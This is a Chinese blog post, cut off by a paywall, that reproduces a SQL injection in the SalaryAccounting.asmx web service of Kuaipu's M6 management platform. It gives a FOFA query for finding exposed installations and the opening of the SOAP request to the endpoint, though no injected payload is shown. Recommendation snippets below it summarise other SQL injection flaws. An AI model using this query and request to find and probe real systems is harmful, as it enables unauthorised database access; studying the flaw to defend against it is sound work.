快普整合管理平台系统SalaryAccounting.asmx存在SQL注入漏洞(含批量验证poc)

已于 2024-04-15 20:29:51 修改
阅读量103 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: sql web安全 数据库
于 2024-04-15 20:28:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137794346
版权

产品简介

Kuaipu-M6整合管理平台系统是厦门快普信息技术有限公司累积近15年的IT经营历程和IT管理咨询实践研发而成的中小企业整合管理及业务应用软件。

漏洞描述

厦门快普信息技术有限公司Kuaipu-M6整合管理平台系统SalaryAccounting.asmx接口存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

fofa

app=”快普-M6”

漏洞复现

POST /WebService/HR/Salary/SalaryAccounting.asmx HTTP/1.1
Host: 
Content-Type: text/xml; charset=utf-8
Content-Length: 676
SOAPAction: "http://tempuri.org/Calculate"

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
 <soapenv:Header/>
 <soapenv:Body>
   <tem:Calculate>
    <!--type: string-->
    <tem:SalaryCategory></tem:SalaryCategory>
    <!--type: string-->
    <tem:StaffBirthDay></tem:StaffBirthDay>
    <!--type: string-->
    <tem:sta
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
正方教务系统新版sql注入漏洞利用工具
01-19
本人研究了/service.asmx中的其它接口,发现zfcwjk1存在同样的注入漏洞,特将注入方法写成工具供大家学习参考。 zfcwjk1似乎是一个财务类的确认接口,利用起来稍微麻烦点,需要一个目标学校的任意学号。 程序执行后...
红帆OA udfmr.asmx SQL注入漏洞复现
0xSec
08-18 3258
红帆iOffice.netudfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
【1day】复现广联达-Linkworks 协同办公管理平台ConfigService.asmx接口SQL注入漏洞
记录并分享学习安全的知识点..
08-12 650
广联达科技股份有限公司成立于1998年,以建设工程领域专业应用为核心基础支撑,以产业大数据、产业新金融等为增值服务的数字建筑平台服务商。广联达-Linkworks 协同办公管理平台ConfigService.asmx接口SQL注入漏洞
实战 | 攻防演练中某市医院的SQL注入
weixin_54787877的博客
05-25 1321
前言 这次演习中打算搞一手医院。 虽然漏洞已上报,但还是会打码。 攻击手法: SQL注入攻击 瓶颈难点: 1.主站 1.sqlmap无法读取数据表 2.无法使用os-shell来getshell 3.网站找不到绝对路径,sql-shell没法写shell 2.医院综合查询系统 有DBA权限但是不能os-shell。 网站找不到绝对路径,sql-shell没法写shell 大家有好思路可以评论一起交流一下哈。 实战过程 1.日常目测一波: 看到搜索框来试试SQL注入和XSS 输入个“单引号”直接中奖,真
快普M6SalaryAccounting接口存在SQL注入
m0_46604997的博客
04-02 428
快普M6pro产品主要解决这些行业的集成管理、销售管理、运维管理、租赁管理、协同办公管理和供应链财务管理管理需求,建立可持续发展的经营管理模式,彻底消除信息孤岛和管理死角。快普M6 的 /WebService/HR/Salary/SalaryAccounting.asmx 接口处存在SQL注入漏洞,攻击者可以窃取用户的隐私信息、业务数据等,造成用户信息泄露、企业品牌受损、法律风险等相关安全问题。
SQL注入漏洞演示源代码
04-24
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
ajax跨域请求WebService.asmx
08-22
ajax跨域请求WebService.asmx,程序非常完美的跑起来了。辛苦了一下午整理出来的。怕的就是以后自己忘记了。
java调用.asmx详细实例
12-14
JAVA调用.asmx详细实例,应用于java web 工程中。很细致哟
sql将日期区间拆分为多行
chinacmt的博客
04-25 296
日期拆分
如何写好SQL
jiangchao98的博客
04-23 1102
split函数返回的结果是一个数组类型,因此在进行一些操作时需要将其转换为其他适合的数据类型,例如字符串或结构体等。使用Hive中的LATERAL VIEW关键字来进行表的展开操作,并将展开的结果作为一列结果集中的元素。【解析 json 的字符串 json_string, 同时指定多个 json 数据中的 column,返回对应的 value。如果输入的 json 字符串无效,结果返回 NULL】在 Hive 中,array_join 函数用于将一个数组中的元素按照指定的分隔符连接成一个字符串。
SqlSessionFactory
weixin_42594143的博客
04-26 397
在使用SqlSessionFactory时,需要注意的是,它是一个重量级的对象,一般情况下,应该尽量避免频繁地创建和销毁SqlSessionFactory对象,可以将其作为单例对象在整个应用中共享。SqlSessionFactory是MyBatis框架中的一个重要接口,用于创建SqlSession对象。SqlSessionFactory的主要作用是创建SqlSession对象,它是一个线程安全的对象,一般情况下,一个应用中只需要创建一个SqlSessionFactory对象即可,因为它的创建是比较耗时的。
SQL底层执行过程
最新发布
qq_14886109的博客
04-28 576
SQL底层执行过程,INNODB,二阶段提交
优化SQL的方法
weixin_44139651的博客
04-26 874
使用join实现,但不适合join太多表,阿里巴巴开发者手册的规定,join表的数量不应该超过3个,join表数量太多时,会导致mysql在选错索引。一般SQL优化第一考虑的是索引优化,可使用explain命令,查看MySQL的执行计划,确认SQL是否有走索引。相对连接查询,子查询使用in关键字实现,具有结构化,相对简单,但是需要创建和删除临时表,增加资源消耗。索引可提升SQL效率,但索引需要额外的存储空间,而且还会有一定的性能消耗。left join,两个表的交集,以及左表剩余的数据,左表为驱动表。
SQL的基础语句
qq_51321722的博客
04-22 1292
因此在写子查询语句时,可以先测试下内层的子查询语句是否输出了想要的内容,再一层层往外测试,增加子查询正确率。使用SELECT查询时,如果结果集数据量很大,比如几万行数据,放在一个页面显示的话数据量太大,不如分页显示,每次显示100条。上述查询LIMIT 3 OFFSET 0表示,对结果集从0号记录开始,最多取3条。包左边表的全部行(不管右边的表中是否存在与他们匹配的行),以及右边表中全部匹配的行。包右边表的全部行(不管右边的表中是否存在与他们匹配的行),以及左边表中全部匹配的行。
SpringBoot中多数据源灵活切换解决方案
lucky_love816的博客
04-26 961
本篇内容介绍了“SpringBoot中如何使用Dynamic Datasource配置多数据源”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!支持 数据源分组 ,适用于多种场景 纯粹多库 读写分离 一主多从 混合模式。支持无数据源启动,支持配置懒启动数据源(3.3.2+)。支持数据库敏感配置信息 加密 ENC()。支持每个数据库独立初始化表结构schema和数据库database。
sql server 恢复数据库、单表数据的方法
SS33SSS的博客
04-23 228
弹出选择文件框,点【添加】--然后选刚刚的XX.bak文件--我这里就是放在D盘、一下子就找到了,确定,如下图。2、下面开始还原(恢复)数据库,对着【数据库】右键--【新建数据库】--然后随便命名,如下图。1、查看备份文件在哪个路径、一般文件夹名都是叫:Backup。7、点【选项】--【覆盖】那一项打上勾--确定,如下图。
云原生的数据库佼佼者!PostgreSQL
乔木的博客
04-26 484
本文介绍了PostgreSQL的原理和常用语句,并通过代码块进行了展示。通过学习这些知识,您可以更好地理解和使用PostgreSQL数据库
广汽传祺m6pro说明书
05-13
广汽传祺M6 Pro是一款豪华中大型SUV车型,相比其前代车型M6,M6 Pro在设计上更加精湛,同时也升级了引擎和配置。在此份说明书中,我们将为您详细介绍M6 Pro的各项性能和功能。 首先,M6 Pro配有2.0T和3.0T两款不同的发动机,其中2.0T发动机最大功率达到了220马力,3.0T则可输出最大功率370马力,使得这款SUV有更强的动力性能。此外,M6 Pro还配备了8AT智能变速器,让换挡更为顺畅,降低了行驶噪音和燃油消耗。 在安全方面,M6 Pro有盲点监测、自动泊车、智能限速、自适应巡航等先进的辅助驾驶系统,大大提升了车辆安全性。 对于外观设计,M6 Pro跟M6相比,更为豪华精致。前脸采用传祺新家族式设计,格栅和头灯更为大气,整车线条更流畅自然。内饰也更加注重细节,采用了高质感的材料,配备全液晶仪表盘和中控液晶屏,仪表盘和中控屏有多种可选的显示风格,让您的驾驶更加个性化。 值得一提的是,M6 Pro还拥有智能家居互联功能,可通过手机APP遥控车内电器设备,如空调、音响等,让驾驶更为便捷舒适。 总之,广汽传祺M6 Pro是一款豪华精致、性能出众、安全可靠的SUV车型,让您的驾驶之旅更加愉悦和安心。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值